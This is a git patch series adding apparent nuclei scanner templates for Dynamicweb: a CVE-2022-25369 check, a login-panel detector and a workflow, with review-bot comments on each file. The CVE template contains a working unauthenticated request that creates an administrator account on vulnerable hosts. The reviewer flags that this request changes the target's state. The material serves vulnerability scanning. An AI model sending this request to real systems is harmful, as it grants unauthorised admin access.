From e400d6f1bb4177f94ca6e3b94af48967e9a211bc Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 24 Feb 2022 13:44:58 +0530
Subject: [PATCH 1/3] Added CVE-2022-25369
---
cves/2022/CVE-2022-25369.yaml | 36 +++++++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
create mode 100644 cves/2022/CVE-2022-25369.yaml
diff --git a/cves/2022/CVE-2022-25369.yaml b/cves/2022/CVE-2022-25369.yaml
new file mode 100644
index 0000000000..ca5f5efd7f
--- /dev/null
+++ b/cves/2022/CVE-2022-25369.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-25369
+
+info:
+ name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
+ author: pdteam
+ severity: critical
+ reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
+ metadata:
+ shodan-query: http.component:"Dynamicweb"
+ tags: cve,cve2022,dynamicweb,rce,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"Success": true'
+ - '"Success":true'
+ condition: or
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+ - 'ASP.NET_SessionId'
+ condition: and
+ case-insensitive: true
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From 7c8a4653e490a9da8859dac781a693eef1dd02ba Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 24 Feb 2022 13:45:13 +0530
Subject: [PATCH 2/3] Added Dynamicweb Login Panel detection
---
exposed-panels/dynamicweb-panel.yaml | 35 ++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 exposed-panels/dynamicweb-panel.yaml
diff --git a/exposed-panels/dynamicweb-panel.yaml b/exposed-panels/dynamicweb-panel.yaml
new file mode 100644
index 0000000000..7542224ae7
--- /dev/null
+++ b/exposed-panels/dynamicweb-panel.yaml
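Review bot: In cves/2022/CVE-2022-25369.yaml the check is state-changing, and nothing in the template says so: a match means the GET to `/Admin/Access/Setup/Default.aspx?Action=createadministrator` has actually created an administrator on the scanned host, with a random name that is not reported back to the operator. The `info` block has no `description`, so whoever runs the scan sees only the name and severity. I would add `description: Sends the setup request that creates an administrator account; a match means a new admin user now exists on the target and must be removed after the scan.` and extend the tag line to `tags: cve,cve2022,dynamicweb,rce,unauth,intrusive` so the template can be excluded from routine scans by tag. Replacing the first `{{rand_base(6)}}` with a fixed, documented username prefix plus a random suffix (password left random) would also make leftover accounts easy to find and delete during cleanup.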
@@ -0,0 +1,35 @@
+id: dynamicweb-panel
+
+info:
+ name: Dynamicweb Login Panel
+ author: pdteam
+ severity: info
+ reference: https://www.dynamicweb.com
+ metadata:
+ shodan-query: http.component:"Dynamicweb"
+ tags: panel,dynamicweb
+
+requests:
+ - raw:
+ - |
+ GET /Admin/Access/default.aspx HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - Dynamicweb
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - version ([0-9.]+)
\ No newline at end of file
From c086a3816e839f52e7aeb80583ce8575bb37712d Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 24 Feb 2022 13:45:25 +0530
Subject: [PATCH 3/3] Added Dynamicweb workflow
---
workflows/dynamicweb-workflow.yaml | 11 +++++++++++
1 file changed, 11 insertions(+)
create mode 100644 workflows/dynamicweb-workflow.yaml
diff --git a/workflows/dynamicweb-workflow.yaml b/workflows/dynamicweb-workflow.yaml
new file mode 100644
index 0000000000..4fe2c21b53
--- /dev/null
+++ b/workflows/dynamicweb-workflow.yaml
@@ -0,0 +1,11 @@
+id: dynamicweb-workflow
+
+info:
+ name: Dynamicweb Security Checks
+ author: pdteam
+ description: A simple workflow that runs all dynamicweb related nuclei templates on a given target.
+
+workflows:
+ - template: exposed-panels/dynamicweb-panel.yaml
+ subtemplates:
+ - tags: dynamicweb
\ No newline at end of file
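Review bot: In exposed-panels/dynamicweb-panel.yaml the body matcher is the single word `Dynamicweb`, so any 200 response at `/Admin/Access/default.aspx` that merely mentions the product name (a catch-all page, a generator tag, an error page served with 200) is reported as a login panel. Because the workflow in patch 3/3 uses this template as its gate, a false positive here also triggers every `dynamicweb`-tagged check. I would add a second word taken from the real login form and require both, e.g. `- '<login-form-specific string>'` followed by `condition: and`, with the placeholder filled in from a captured response. The extractor's `version ([0-9.]+)` is unanchored and will capture the first "version x.y" text anywhere in the body, so it is worth confirming against a real panel that this is the product version.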
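Review bot: In workflows/dynamicweb-workflow.yaml the `subtemplates` selector `tags: dynamicweb` is broader than it needs to be: it appears to match the gate template itself (tagged `panel,dynamicweb`), and it will silently pick up any future template carrying that tag, including ones that modify the target like the CVE-2022-25369 check from patch 1/3. Listing the intended templates explicitly keeps the workflow's side effects reviewable, e.g. `- template: cves/2022/CVE-2022-25369.yaml`. The `description` should also say that, once the panel is detected, the workflow sends a request that creates an account on a vulnerable host.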